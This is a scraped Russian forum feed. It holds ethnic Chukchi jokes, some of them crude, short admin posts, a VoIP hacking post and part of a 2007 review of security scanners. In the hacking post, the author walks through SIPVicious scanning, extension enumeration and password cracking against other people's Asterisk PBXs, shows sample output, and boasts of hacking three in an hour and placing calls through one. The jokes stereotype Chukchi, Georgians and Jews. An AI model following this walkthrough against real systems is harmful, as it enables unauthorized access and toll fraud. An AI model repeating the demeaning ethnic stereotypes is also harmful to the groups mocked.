Чукча, что ты делаешь?<br />Он отвечает: <br />- Песню пою. <br />Геологи: <br />- Ясно, что песню поешь а что такое &quot;красный, желтый, зеленый&quot;? <br />Чукча: <br />- Цветомузыка, однако.</p> <p>Чему с pаннего детства чукчи учат своих детей?<br />- Желтый снег нельзя кушать. Hикогда не кушай желтый снег.</p> <p>Однажды Чукча принес в редакцию свой роман. Редактор прочитал и говорит: &quot; Понимаете ли, слабовато... Вам бы классику&#160; читать.&#160; Вы Тургенева&#160; читали?&#160; А Толстого? А Достоевского?..&quot; - &quot;Однако, нет;<br />Чукча - не читатель, Чукча - писатель.&quot;</p> <p>Однажды&#160; Русский говорит Чукче: &quot;Давай играть: Я загадываю загадку; отгадываешь - я тебе даю рубль, нет - ты мне.&quot;&#160; -&#160; &quot;Давай.&quot; Играют.&#160; &quot;Одна внутри красная, снаружи черная и блестящая.&quot; - &quot;Тюленя?&quot; - &quot;Нет.&quot; - &quot;Оленя?&quot; - &quot;Нет.&quot; - &quot;Тогда не знаю.&quot; - &quot;Одна галоша.&quot; Чукча кладет рубль. &quot;Две внутри красных,&#160; снаружи&#160; черных и<br />блестящих.&quot; - &quot;Тюленя?&quot; - &quot;Нет.&quot; - &quot;Оленя?&quot; - &quot;Нет.&quot; -&#160; &quot;Тогда&#160; незнаю.&quot; - &quot;Две галоши.&quot; Рубль...<br /> ...Ночь, сидят Русский и Чукча, играют. &quot;1689 внутри красных, снаружи&#160; черных и блестящих.&quot; - &quot;Тюленя?&quot; - &quot;Нет.&quot; - &quot;Оленя?&quot; - &quot;Нет.&quot; - &quot;Тогда не знаю.&quot; - &quot;1689 галош&quot;...</p> <p>Чукча вернулся из армии, а у его жены - ребенок. &quot;Однако, откуда ребенок: меня ведь не было?&quot; - &quot;Так ведь ты же фотографию&#160; присылал из армии, помнишь?&quot; - &quot;Однако, но ведь там же я до пояса&quot;...</p> <p>Сидят два Чукчи на берегу Ледовитого океана. Один говорит: &quot;Хочешь,&#160; я тебе политический анекдот расскажу?&quot; - &quot;Однако, нет, а то еще сошлют куда-нибудь.&quot;</p> <p>Пришел китайский представитель к Чукчам: &quot;Воевать с вами будем. Вас сколько?&quot; - &quot;Человек пятьсот будет. А вас?&quot; - &quot;Один миллиард.&quot;<br />- &quot;Тц-тц-тц, однако, где ж хоронить вас будем?&quot;</p> <p>Чукча говорит жене: &quot;Не знаешь, почему про нас говорят, что мы такие /стучит по дереву/ ?&quot; Жена: &quot;Стучат.&quot; Чукча:&#160; &quot;Сиди,&#160; я&#160; сам открою.&quot;</p> <p>Однажды Чукча купил шкаф с внутренним зеркалом. Открывает его дома: &quot;Жена, смотри, ко мне брат приехал!&quot; Жена подходит: &quot;И с ним баба какая-то...&quot;</p> <p>Приезжает Чукча в Госплан. &quot;Однако,&#160; 3000&#160; кирпичей&#160; надо.&quot;&#160; -<br />&quot;Зачем?&quot; - &quot;Экономическая эксперимента.&quot; Дали. Приезжает Чукча через год. &quot;Однако, 3000 кирпичей надо.&quot; - &quot;Зачем?&quot; - &quot;Экономическа эксперимента.&quot;&#160; Дали. Приезжает Чукча еще через год. &quot;Однако, 3000 кирпичей надо.&quot; - &quot;Зачем?&quot; - &quot;Экономическая&#160; эксперимента.&quot;&#160; Дали, но&#160; решили проверить, что он с кирпичами делает. Приезжают, видят: сидит Чукча на берегу, кирпичи в воду кидает. &quot;Что ты делаешь?&quot;&#160; - &quot;Однако,&#160; думаю:&#160; почему кирпичи квадратные, а следы на воде круглые?&quot;</p> <p>Однажды посадили Чукчу и обезьяну на необитаемый остров.&#160; Приезжают - у чукчи огромные уши, а у обезьяны шишка на лбу. Повторили эксперимент. Приезжают - опять то же самое. Опять повторили эксперимент&#160; и&#160; решили проследить. Смотрят: Чукча оттопыривает ухо:<br />&quot;Это что шумит?&quot; Обезьяна - стучит себя по лбу - &quot;Во-до-пад!!!&quot;</p> <p>Чукский национальный театр поставил спектакль &quot;Цезарь и&#160; Брут&quot; в трех отделениях.<br />Действие первое. На сцену выходит большой Чукча, бьет себя кулаком в грудь: &quot;Я - Цезарь!&quot; Занавес.<br />Действие&#160; второе.&#160; На сцену выходят большой Чукча, Чукча поменьше.<br />Большой: &quot;Я - Цезарь!&quot; Поменьше: &quot;Я - Брут!&quot; Занавес.<br />Действие третье. На сцену выходят большой Чукча, Чукча поменьше&#160; и маленький&#160; Чукча. Большой: &quot;Я - Цезарь!&quot; Поменьше: &quot;Я - Брут!&quot; Маленький: &quot;Я - Брут!&quot; Большой: &quot;И ты - Брут?&quot; Занавес.</p> <p>Приехал Чукча в Москву. Едет в такси по городу. Вдруг&#160; наперерез&#160; -&#160; старушка. Водитель - вправо, и старушка вправо, водитель - влево и старушка влево. Еле-еле разминулись.&#160; Едут&#160; дальше.&#160; Чукча говорит:&#160; &quot;Русский&#160; охотник - плохой охотник. Если бы Чукча дверцу не открыл - ушла бы старуха!&quot;</p> <p>Чукчу предупредили, что московские таксисты - жулики.&#160; Приехал Чукча&#160; в&#160; Москву,&#160; проехался на такси. Ему водитель говорит: &quot;С вас три - двадцать пять.&quot; Чукча думает: &quot;Чукча не дурак, Чукчу не&#160; обманешь.&quot;&#160; И начинает отсчитывать: раз - двадцать пять, два - двадцать пять, три - двадцать пять.</p> <p>Однажды Чукча собрался в Москву. Ему говорят: &quot;Привези дефицита.&quot; - &quot;А где это?&quot; - &quot;А как увидишь очередь - значит&#160; за&#160; дефицитом.&quot; И&#160; вот&#160; Чукча&#160; в Москве. Поймал такси и говорит водителю: &quot;Вези за дефицитом.&quot; - &quot;В ГУМ? В ЦУМ? В Петровский пассаж?&quot; - &quot;Однако, куда очередь длиннее.&quot; Водитель подвез Чукчу к&#160; ГУМу.&#160; Вышел&#160; Чукча&#160; на Красную&#160; площадь,&#160; увидел&#160; очередь&#160; в Мавзолей и говорит таксисту: &quot;Однако, я здесь встану, а ты вечером за&#160; мной&#160; заезжай.&quot;&#160; Вечером таксист приехал и спрашивает: &quot;Ну как?&quot; - &quot;Однако, не повезло: пока до прилавка дошел - продавец помер.&quot;</p> <p>Едут&#160; в такси на переднем сиденье, рядом с водителем Чукча, а на заднем - Грузин. Водитель спрашивает Чукчу: &quot;Вам куда?&quot; А Чукча только и умеет по-русски спросить: &quot;Как диля?&quot;&#160; -&#160; &quot;Куда-куда?&quot;&#160; -<br />&quot;Как диля?!&quot; - &quot;Не понимаю,&quot; - &quot;Как диля?!&quot; Водитель оборачивается к Грузину: &quot;Что он говорит?&quot; - &quot;Патамучто!&quot;</p> <p>Однажды Чукче в Москве таксист загадал загадку: &quot;Кто сын моей матери, но не мой брат?&quot; - &quot;Однако, не знаю.&quot; - &quot;Я сам!&quot;.&#160; Вернулся Чукча&#160; домой&#160; и&#160; рассказывает загадку: &quot;Кто сын моей матери, но не мой брат?&quot; - &quot;Не знаем.&quot; - &quot;Московский таксист, однако!&quot;</p> <p>Чукча получил новую квартиру и показывет гостям. Первая комната: &quot;Здесь у меня тундра.&quot; Вторая комната: &quot;Здесь у меня&#160; тундра. &quot; Кухня: &quot;Здесь у меня тундра.&quot; Туалет: &quot;Здесь мой чум.&quot; Его спрашивают: &quot;А куда же ты в туалет ходишь?&quot; - &quot;В тундру!&quot;</p> <p>Получил&#160; Чукча квартиру и хвастается друзьям: &quot;Квартира хорошая, только умывальник странный: я нажимаю ручку, начинает&#160; литься вода; руки помыть еще успеваю, а зубы почистить - нет.&quot;</p> <p>Однажды Чукча пришел в магазин: &quot;Однако, сколько эта гармошка стоит?&quot; - &quot;Мы чукчам гармошки не продаем .&quot; Чукча пошел, переоделся под Хохла. &quot;Скильки буде гармошка стоить?&quot; - &quot;Мы чукчам гармошки не продаем.&quot; Пошел, переоделся под Грузина. &quot;Па-ачем этот&#160; гармошка?&quot;&#160; - &quot;Мы чукчам гармошки не продаем.&quot; - &quot;А как вы каждый раз узнаете, что я - Чукча?&quot; - &quot;А только Чукча может назвать&#160; гармошкой батарею парового отопления.&quot;</p> <p>Однажды Чукча зашел в магазин: &quot;Однако, шампуня есть?&quot; - &quot;Есть только &quot;Яичный&quot;, - &quot;Однако, жаль. Я весь хотел помыться.&quot;</p> <p>Однажды Чукча купил холодильник. Его спрашивают: &quot;Чукча, зачем Вам&#160; холодильник?&quot; - &quot;Однако, зимой греться: зимой на улице -40, а в холодильнике -4.&quot;</p> <p>Однажды Чукча пришел в магазин: &quot;Однако, у вас цветные телевизоры есть?&quot; - &quot;Есть&quot;, - &quot;Тогда дайте, пожалуйста, зеленый.&quot;</p> <p>Приезжает Чукча в стойбище в вельветовых джинсах. Его&#160; спрашивают:&#160; &quot;Зачем&#160; тебе&#160; вельветовые&#160; джинсы?&quot; - &quot;Однако, чтобы каждая вошка по своей дорожке бегала.&quot;</p> <p>Чукча тонет и кричит: &quot;Однако, воду пью!&#160; Однако,&#160; много&#160; пью! Однако, на ночь здесь останусь!&quot;</p> <p>Два&#160; чукчи&#160; подходят к начальнику поезда. Первый: &quot;Этот поезд довезет меня до Ленинграда?&quot; - &quot;Нет.&quot; Второй: &quot;А меня?&quot;</p> <p>Однажды начальник вокзла видит: подходит Чукча к вагону поезда и бьется об него головой, подходит к следующему - и головой,&#160; подходит к третьему - и головой, и т.д. Начальник спрашивает: &quot;Чукча, Вы свихнулись?&quot; - &quot;Однако, нет, Чукча мягкий вагон ищет.&quot;</p> <p>Однажды&#160; Чукча&#160; ехал в поезде. Приезжает - весь в синяках и в ссадинах. &quot;Чукча, что с Вами?&quot; - &quot;Однако, на верхней&#160; полке&#160; ехал, все&#160; время&#160; вниз падал.&quot; - &quot;Так что же Вы не поменялись с тем, кто на нижней полке ехал?&quot; - &quot;Однако, поменяться не мог -&#160; там&#160; никого не было.&quot;</p> <p>Однажды&#160; Чукча подходит к кассам поездов дальнего следования. &quot;Скажите, а поезд 975 идет на Беркакит?&quot; - &quot;Нет.&quot; - &quot;А поезд&#160; 1007 идет&#160; на&#160; Беркакит?&quot;&#160; - &quot;Нет.&quot; - &quot;А поезд 911 идет на Беркакит?&quot; - &quot;Нет.&quot; - &quot;А куда?&quot; - &quot;На ...!!!&quot; - &quot;А это через Беркакит?&quot;</p> <p>Однажды Чукча ехал в одном купе с Девицей. Чукча зажал в&#160; зубах металлическую&#160; пластинку&#160; и сидит играет на ней: &quot;Дззинннь!..Дззинннь!..Дззинннь!..&quot; Девица: &quot;Перестань!&quot; Чукча отложил свой&#160; музыкальный&#160; инструмент&#160; и стал смотреть в окно. Через некоторое время Девица вышла, переоделась, вернулась и села весьма соблазнительно. Чукча стал смотреть на нее. Девица: &quot;Хочется?&quot; - &quot;Хочется.&quot; -&#160; &quot;Ну давай,&#160; только&#160; быстро!&quot;&#160; Чукча&#160; схватил зубами пластинку: &quot;Динь -динь - динь - динь - динь!&quot;</p> <p>Чукча спрашивает в кассе Аэрофлота: &quot;Самолет до Чукотки сколько летит?&quot; - &quot;Минуточку...&quot; - &quot;Спасибо.&quot;</p> <p>Однажды чукча вернулся из Москвы и рассказывает: &quot;Однако, Москву видел. лозунг &quot;Все во имя человека, все&#160; для&#160; блага&#160; человека&quot; видел, и человека этого видел.&quot;</p> <p>Бежит&#160; Чукча&#160; по&#160; улице и кричит: &quot;Свободу Путину! Свободу Путину!&quot; Его останавливают. &quot;Чукча, Вы с ума сошли?&quot; - &quot;Однако, только что по радио слышал: &quot;В заключении Владимир Владимирович Путин сказал...!&quot;</p> <p>Два Чукчи смотрят в небо. &quot;Однако, самолет летит! Правительство!&quot;&#160; - &quot;Однако, вряд ли: когда правительство, тогда еще вокруг мотоциклы: &quot;тр-р-р-р!&quot;.&quot;</p> <p>Однажды гуляет Чукча по Красной площади. Остановился,&#160; смотрит на&#160; часы на Спасской башне. Подходит мужик. &quot;Нравятся?&quot; - &quot;Нравятся,&quot; - &quot;Хочешь?&quot; - &quot;Хочу,&quot; -&#160; &quot;Давай&#160; тысячу&#160; рублей&#160; и&#160; жди&#160; меня здесь,&#160; я&#160; за&#160; лестницей сбегаю.&quot; Взял деньги и убежал. Через несколько часов Чукча понял, что его&#160; обманули.&#160; Приехал&#160; домой,&#160; все рассказал.&#160; Приехал&#160; его&#160; брат в Москву. Стоит на Красной площади, смотрит на часы. Подходит мужик. &quot;Нравятся?&quot; - &quot;Нравятся,&quot; -&#160; &quot;Хочешь?&quot;&#160; -&#160; &quot;Хочу,&quot;&#160; -&#160; &quot;Давай тысячу рублей и жди меня здесь, я за лестницей сбегаю.&quot; - &quot;А, нет! Чукча не дурак! Жди ты&#160; меня, я&#160; сам сбегаю!&quot;</p> <p>Выиграл Чукча &quot;Волгу&quot; по лотерейному билету. Приходит и говорит: &quot; Дайте мне красную &quot;Волгу&quot;.&quot; А ему: &quot;Хотите черную? зеленую? синюю? желтую? А красных у нас нет.&quot; - &quot;Ах так, - говорит Чукча, - тогда верните мне мои пятьдесят копеек.&quot;</p> <p>Однажды Чукча купил &quot;Волгу&quot; и поехал в свое стойбище хвастаться, а как тормозить забыл. Покружился, покружился, да и врезался с размаху в камень. Машину - вдребезги, сам - в больницу попал. Вернулся через некоторое время из больницы домой&#160; и&#160; говорит:&#160; &quot;Врачи сказали, хорошо, что мозгов нет, а то было бы сотрясение.&quot;</p> <p>Однажы Чукча купил &quot;Жигули&quot;. Приехал на них к себе в стойбище. Высыпал&#160; народ,&#160; любуется.&#160; Один Чукча протер фары. &quot;Однако, какие большие глаза!&quot; Другой похлопал по крыше. &quot;Однако,&#160; какая&#160; крепкая шкура!&quot; Третий подергал за выхлопную трубу. &quot;Однако, - самец!&quot;</p> <p>Поехал Чукча на машине путешествовать. Все стойбище его провожало. Через некоторое время приходит телеграмма: &quot;Приехал нормально,&#160; вернусь такого-то.&quot; Все стойбище высыпало его встречать. Ждут Чукчу - нет его. День ждут, два ждут. Через месяц&#160; приезжает.&#160; Его спрашивают, отчего такая задержка? &quot;Однако, туда - три скорости, а обратно - одна, и голова устает задом наперед за дорогой следить.&quot;</p> <p>Однажды&#160; Чукча&#160; с сыном охотятся в тайге. Видят - белка. Пфф! &quot;Однако, - шкурка.&quot; Видят - лось. Пфф! &quot;Однако, - мясо.&quot;&#160; Видят&#160; - геологи. Пфф! Пфф! Пфф! &quot;Однако, - спички.&quot;</p> <p>Сидит Чукча с женой и дочкой в чуме. Над чумом пролетает вертолет. Чукча говорит: &quot;Опять большая машина летит, опять бородатые люди придут, огненная вода пить будут, меня бить будут, /жене/ тебя бить будут, /дочке/ тебя ..... будут: экспедиция!&quot;</p> <p>В тайге замерзал Геолог. Его нашел Чукча, привел к себе домой, накормил, напоил, со своей женой спать&#160; уложил. Геолог&#160; в&#160; порыве благодарности&#160; пригласил его к себе в гости, в Москву. И вот через некоторое время получает от Чукчи телеграмму: &quot;Еду, встречай.&quot; Геолог&#160; думает: &quot;Ну, накормлю, напою, но не класть же его с моей женой!&quot; Сбегал к трем вокзалам, нашел там &quot;девочку&quot; и уговорил ее за десятку переспать с Чукчей. А Чукче сказал: &quot;Ты хороший друг,&#160; так что&#160; же&#160; я тебя со своей повседневной женой уложу? Я тебя уложу со своей парадной женой.&quot; Чукча&#160; вернулся&#160; из&#160; Москвы,&#160; рассказывает: &quot;Хороший город Москва! Хороший друг Геолог! А жена парадная у него<br />такая хорошая! - до сих пор с ... капает!&quot;</p> <p>Один&#160; Геолог заблудилсмя, несколько дней голодал, зарос и змерз. Ползет и видит: сидит Чукча, и рядом -&#160; гора&#160; рыбы.&#160; &quot;Чукча, дай рыбы - умираю!..&quot; - &quot;однако, не могу, - у начальника&#160; спросить надо,&quot;&#160; -&#160; &quot;А&#160; кто&#160; у тебя начальник?&quot; - &quot;Я сам себе начальник!&quot; - &quot;Начальник, дай рыбы!&quot; - &quot;Однако, бери сколько хочешь!&quot;</p> <p>Однажды приходит беременная Чукча&#160; ко&#160; врачу.&#160; &quot;Доктор,&#160; живот раздуло,&quot;&#160; - &quot;Да ты ж беременна!&quot; - &quot;Однако, быть не может - муж в тайге,&quot; - &quot;А ты, наверное, с другими мужчинами спала,&quot; - &quot;С мужчинами - нет, с геологом спала, так ведь&#160; он&#160; предохранялся,&quot;&#160; -&#160; &quot;А как?&quot; - &quot;Однако, тряпку мне на морду кидал.&quot;</p> <p>Заблудился Геолог в тайге, кричит: &quot;Люди! Где вы!? Помогите!&quot; Выходит из-за дерева Чукча и говорит: &quot;А, как здесь - так &quot;люди!&quot;, а как в Москве - так &quot;сковородки с ушами&quot;!&quot;</p> <p>Однажды у Чукчи родился шестой ребенок. Вот Чукча и&#160; заполняет метрику: национальность отца - Чукча, национальность матери - Чукча, национальность ребенка - китаец. Его спрашивают: &quot;Как же китаец,&#160; если&#160; вы, родители - чукчи?&quot; - &quot;Однако, Чукча газету читал, а там написано, что сейчас каждый шестой на Земле - китаец.&quot;</p> <p>Однажды&#160; Чукчи&#160; захотели породниться с Евреями. Приходят свататься. &quot;Однако, у вас дочка - у нас сын, хотим породниться с&#160; вами.&#160; Однако,&#160; юрта&#160; у&#160; вас&#160; старая&#160; - новую надо, - кладут на стол 50000, - Однако, оленей у вас нет&#160; -&#160; много&#160; надо,&#160; -&#160; кладут&#160; еще 50000,&#160; -&#160; Однако,&#160; дочка&#160; у вас бедно одета - богато надо,&quot; - еще 50000. Старый Еврей говорит своей жене: &quot;Сарра, не кажется ли&#160; тебе, что наши новые родственники больше похожи на японцев?&quot;</p> mybb@mybb.ru (admin) Tue, 14 Apr 2009 23:08:57 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=186#p186 http://sliphot.bbon.ru/viewtopic.php?pid=185#p185 <p>Если у Вас есть предложения или пожелания по дальнейшему развитию радио MUZZONE, то пишите все в этой теме и мы обязательно увидим их!</p> mybb@mybb.ru (admin) Tue, 14 Apr 2009 22:39:08 +0400 http://sliphot.bbon.ru/viewtopic.php?pid=185#p185 http://sliphot.bbon.ru/viewtopic.php?pid=184#p184 <p><span style="color: yellow">Не знаю как это тащит пароли, но винда у меня упала при первом выключении)))я чуток затупил с этим зверьком)))</span></p> mybb@mybb.ru (admin) Mon, 16 Feb 2009 20:43:54 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=184#p184 http://sliphot.bbon.ru/viewtopic.php?pid=183#p183 <p><span style="color: lime">Остальные Ступеньки выложены <a href="http://www.postroika.ru/html/17step2.html" rel="nofollow" target="_blank">Тут</a></span></p> mybb@mybb.ru (admin) Mon, 16 Feb 2009 19:34:06 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=183#p183 http://sliphot.bbon.ru/viewtopic.php?pid=165#p165 <p>05.12.2008</p> <p>Недавно, моих знакомых нагрели на хорошую сумму пролив через их voip сеть изрядное количество забугорного трафика...<br />Я подумал, а ведь черт возьми наверно это просто написать скрипт который будет шерстить интернет в поисках глупых админов...<br />Сказано, сделано, скрипт написан но я им не поделюсь, потому как это чистой воды криминал, а вот рассказать про механизм могу...</p> <p>you are welcome</p> <p>Итак задача по получению несанкционированного доступа на asterisk...</p> <p>SIPVicious tool suite</p> <p>Задача №1, определить список SIP proxy доступных в некой сети X, поиск ведется пингом SIP сообщениями по порту 5060…</p> <p>./svmap.py X.X.X.X/16</p> <p>:) мы будем искать на просторах сети всеми любимый asterisk</p> <p>./svmap.py X.X.X.X/16 | grep -i asterisk</p> <p>на выходе… если он есть конечно:) , имеем список чужих IP PBX asterisk…</p> <p>Задача №2, определить список живых userID ( в случае с IP PBX мы будем искать phone extensions) на удаленном SIP Proxy. Технология чудовищна проста, мы будем посылать на удаленный proxy сообщения REGISTER (также можно INVITE или OPTIONS задается опцией -m) в которых перебираем значения userID, очень тупо и очень эфективно. В процессе перебора скрипт анализирует ответ SIP Proxy, в случае если мы получаем 401 или 200 OK , –&gt; userID найден, во всех остальных случаях результат отрицательный. Вы конечно будут смеяться но первый найденный мною asterisk рассказал о себе следующее:</p> <p>./svwar.py -p 5060 ip_address_IP_PBX -e100-999</p> <p>| Extension | Authentication |<br />——————————<br />| 200 | noauth|</p> <p>| 201 | reqauth |</p> <p>На удаленном прокси мы нашли два userID, на запрос с userID = 200 пришел ответ 200 OK, берем любой sip softphone, указываем в качестве sip proxy ip address нашей жертвы, в качестве userID пишем 200, поле пароля оставляем пустым, пробуем позвонить…Asterisk оказался польским, я позвонил в варшаву:), я сходил за пивом и успокоился…</p> <p>Задача №3, что делать с userID для которых скрипт svwar.py выдал “reqauth” (необходима авторизация) ? Тут мы подошли к самой главной ошибке всех админов, внимание никогда, НИКОГДА, не указывайте authorization username = username для регистрации абонентов по SIP ! В случае если нерадивый админ для простоты решил сделать “authorization username = username” нам осталось вычислить пароль, будем делать это тупым перебором…либо перебором по словарю(см.доп. опции в справке -h)</p> <p>./svcrack.py ip_address_IP_PBX -u 200</p> <p>| Extension | Password |<br />————————<br />| 200 | 200 |</p> <p>Вот собственно пароль подобран… Более подробно о опциях вышеуказанных скриптов можно узнать запустив их с опцией -h;)</p> <p>Вкратце всё, естественно весь вышеописанный процесс можно автоматизировать, лучше и правильней это делать с помощью SIPP (я это сделал…) для глобального тестирования сетей.</p> <p>Естественно всё вышесказанное я категорически рекомендую использовать только для проверки собственных сетей и самообразования. Ну и как всегда, автор не несет ответственности за ваши эксперименты…</p> <p>Выводы:</p> <p>1. В мире полно идиотов, за час было взломано три астериска.</p> <p>2. Всегда указывайте указывайте различные значения для authorization username и username для регистрации SIP абонентов.</p> <p>3. Контролируйте количество сигнальных сообщений приходящих на ваш SIP proxy, кругом не только идиоты(см.пункт№1) но и негодяи которые только и думают как нажиться за ваш счет.</p> mybb@mybb.ru (admin) Wed, 11 Feb 2009 20:53:26 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=165#p165 http://sliphot.bbon.ru/viewtopic.php?pid=164#p164 <p>08.10.2007</p> <p>Первое, что приходит в голову многим системным администраторам, когда они думают о защите своих сетей от атак злоумышленников из Интернета, это слово &quot;брандмауэр&quot;. Брандмауэры (сетевые экраны) - неотъемлемая часть инфраструктуры защиты сети, однако просто установить брандмауэр и надеяться на лучшее - опасно и глупо. Если не выбрать надлежащую конфигурацию серверов и не придерживаться сильной стратегии защиты, то шансы на успех у атакующих вашу сеть значительно повышаются. Как уже неоднократно писалось, большинство злоумышленников нападает с внутренней стороны брандмауэра. Это недовольные сотрудники фирмы или хакеры, нашедшие лазейку в системе. По этой причине к защите каждой сети нужно подходить очень внимательно и не ограничиваться предотвращением доступа из Интернета. <br />Еще одно опасное заблуждение заключается в том, что серверы будто бы уже поставляются с необходимыми средствами обеспечения безопасности. Между тем, в защите каждой сетевой операционной системы имеются многочисленные пробелы, и чтобы считать свой сайт действительно защищенным, их необходимо ликвидировать. Отсутствие строгой стратегии обеспечения безопасности интрасети и серверов Интернета может усугубить ситуацию. Чтобы получить бессонницу, администратору сети достаточно попытаться установить последние поправки к системе защиты сетевой ОС. </p> <p>Сделать жизнь сотрудников, отвечающих за работу сети, более спокойной помогут инструментальные средства сканирования сетевой и системной защиты в сочетании с хорошо спланированной стратегией безопасности и ПО обнаружения нарушителей. Эти продукты сканируют сетевые серверы по заданному расписанию и автоматически выводят отчеты, позволяя быстро обнаружить ошибки в конфигурации, неправильно инсталлированное (с точки зрения защиты) серверное ПО и пробелы в защите (преднамеренные или нет), и принять необходимые меры. </p> <p>В лаборатории ZD Internet Lab были испытаны три инструментальных средства защиты на базе Windows NT. <br />К сожалению, компания Network Associates не смогла вовремя представить последнюю версию своего сканера CyberCop Scanner (прежнее название Ballista), Axent Technologies отказалась принять участие в обзоре, сославшись на предстоящее обновление своего продукта, а фирма Netect не подготовила NT-версию продукта Netective (ко времени написания обзора она проходила бета-тестирования, но версия для ОС Solaris уже существует). </p> <p>Итоговый анализ </p> <p>ISS Internet Scanner 5.2 </p> <p>Продукт ISS Internet Scanner 5.2 мы выбрали по многим причинам. Он оказался наиболее полным в плане поиска проблем в системе защиты и предлагал наиболее исчерпывающие решения каждой проблемы. Это ПО выявило все недостатки в защите, обнаруженные остальными двумя продуктами, и дополнило их десятками других найденных пробелов. Функциональные возможности вывода отчетов в Internet Scanner 5.2 оказались просто феноменальными, а сами отчеты детальны и легко читаемы. Они предназначены не только для технических специалистов. В сводных отчетах для руководителя вопросы защиты сети поясняются и становятся намного понятнее. Сканирование сети в Internet Scanner 5.2 производится быстро и полно, а результаты мы смогли использовать для генерации множества отчетов и, при необходимости, обращаться к оригинальным данным. <br />Слабые места систем <br />Существуют следующие, наиболее распространенные, слабые места, характерные для многих сетевых операционных систем. <br />Слабая защита по паролю. <br />Доступ через анонимный FTP. <br />Неиндексированные каталоги WWW. <br />Разрешенная функция Finger. <br />Разрешенные банеры Telnet/sendmail. <br />Разрешенная учетная запись Guest. <br />Неправильная конфигурация RPC. <br />Ошибки в IIS .bat и .cmd. <br />Уязвимость TFTP. <br />Неверная конфигурация NFS. </p> <p>ПО Internet Scanner 5.2 компании Internet Security Systems (Атланта) - самый давний из протестированных нами продуктов оценки защиты, и большой опыт положительно сказывается на его работе. На нас произвели впечатление простота установки данной программы, превосходные средства вывода отчетов и широкая поддержка платформ. </p> <p>Internet Scanner - компонент защиты семейства продуктов SAFEsuite компании Internet Security Systems. Кроме этого, SAFEsuite включает в себя компоненты выявления вторжения RealSecure и инструмент для детального анализа конфигураций серверов Unix System Security Scanner (S3). Разрабатывается версия S3 для Windows NT. Internet Scanner функционирует в сетях Windows NT 4.0, AIX, HP-UX, Solaris и Linux. Продукт может выявлять &quot;дыры&quot; в защите, недостатки в конфигурации Windows NT Server и Workstation, машин Windows 95 и серверов Unix. Все проверки системы и сканирование выполняются через TCP/IP в локальной сети. </p> <p>Установить ПО Internet Scanner оказалось нетрудно. Мы загрузили самую последнюю его версию с веб-узла ISS и легко выполнили процесс инсталляции. После установки ПО на нашем сервере Windows NT нам потребовалось только скопировать файл ключа ISS в каталог Internet Scanner, после чего можно было начинать сканирование. Сервер ключа ISS передал нам лицензионный ключ по электронной почте. Этот ключ определяет, какие именно компоненты Internet Scanner будут доступны пользователю. Таким образом, добавление функциональных возможностей (таких, как сканирование брандмауэра) представляет собой простую и быструю онлайновую процедуру. </p> <p>Пользовательский интерфейс Internet Scanner понравился нам больше всех. &quot;Мастер&quot; создания сеанса значительно упрощает настройку и запуск процедуры сканирования. Основное окно с вкладками спроектировано настолько ясно, что мы смогли сразу легко загрузить несколько сеансов, ускорив тем самым процесс сканирования. Выполнение поверхностного теста сканирования нашего сервера Windows NT Server заняло у Internet Scanner всего 21 секунду, после чего мы получили страницу с результатами - детальным списком обнаруженных проблем и предлагаемых решений. В этом тесте Internet Scanner выявил на нашем сервере 113 ошибок конфигурации и пробелов защиты. Из них было выделено пять проблем высокой степени риска, 10 - средней и 98 - низкой. </p> <p>Не устраняя ни одной из обнаруженных проблем, мы продолжили процесс, выполнив сканирование среднего уровня того же сервера Windows NT Server. На этот раз сканирование заняло немногим более трех минут, и было найдено 114 уязвимых мест. Пять проблем продукт отнес к высокому риску, 11 - к среднему и 98 - к низкому. </p> <p>Наконец, глубокое сканирование нашего сервера Windows NT заняло более 5 минут и показало наличие в нашей конфигурации 115 ошибок. На этот раз число проблем высокого риска увеличилось до шести, проблем со средним риском по-прежнему насчитывалось 11, а проблем низкого риска - 98. <br />Затем мы занялись своим сервером RedHat Linux 5.1, также начав с поверхностного сканирования. Как и в случае аналогичного теста Windows NT, этот процесс занял 20 секунд. Как ни странно, он обнаружил только одну проблему в защите: у нас была включена функция Finger. Эта проблема была отнесена к категории низкого риска. </p> <p>Сканирование среднего уровня сервера RedHat 5.1 потребовало около четырех минут и обнаружило девять пробелов в защите: одну средней степени риска (разрешенный доступ через анонимный FTP) и восемь проблем низкой степени риска. Во время теста с углубленным сканированием продукт нашел 15 проблем, на что ушло примерно 7 минут. Две проблемы были отнесены к средней степени риска, а остальные 13 - к низкой. </p> <p>Средства вывода отчетов в Internet Scanner произвели на нас очень сильное впечатление. Генерируемые в формате Crystal Reports или HTML, разнообразные готовые формы отчетов Internet Scanner должны удовлетворить требования любого сетевого администратора. Если же потребуется создать свои собственные формы, то в Internet Scanner для них легко построить шаблоны. В технических отчетах об уязвимости системы защиты перечислены проблемы, указаны машины, на которые они влияют, предлагаются решения и даже даются ссылки на места в Интернете, где можно найти соответствующие поправки и корректировки. В отчетах для руководителей суммируются характеристики защиты всей сети. </p> <p>Internet Scanner 5.2 соединяет в себе превосходный пользовательский интерфейс, сильные средства создания сеансов и большое число стандартных отчетов. Двухуровневая схема лицензирования (795 $ за лицензию на сканирование 10 серверов и 4995 $ за лицензию на сканирование всей подсети класса C) делает пакет Internet Security Systems доступным как для малых, так и для крупных компаний. </p> <p>NetGuard </p> <p>Инструмент оценки защиты NetGuard компании Network Guardians позиционируется как приложение, полностью основанное на Java. Между тем, когда мы инсталлировали его на своем сервере Windows NT, то обнаружили, что программный код для сканирования Windows NT Workstation и Server на самом деле является &quot;родным&quot; кодом Windows и может работать только в Windows NT. В файле README поясняется, что инструменты сканирования на Java для платформы Windows NT будут доступны в ближайшее время. Конечно, Java - превосходный инструмент для приложений, которые должны работать на разных платформах, но мы не уверены, что это актуально для данной категории продуктов. Нам кажется, что администраторов гораздо больше интересуют реализованные в них средства сканирования и возможность выполнения с любой сетевой рабочей станции. </p> <p>NetGuard оказался единственным из рассматриваемых продуктов, способным обнаруживать уязвимые места в защите Macintosh. Как и Internet Scanner, NetGuard использует для сканирования (локального и удаленного) хост-систем протокол TCP/IP. Между тем, NetGuard не выявил такого количества пробелов в защите, как Internet Scanner, хотя основные &quot;дыры&quot; от него не ускользнули. </p> <p>Мы загрузили NetGuard с веб-узла Network Guardians Website, получив код аутентификации, который позволяет войти в защищенную область узла с загружаемым программным обеспечением. Такой подход позволяет компании регулярно обновлять свой продукт. Кроме того, мы загрузили оттуда последнюю версию (1.16) Java Runtime Edition (JRE) для Windows NT. После 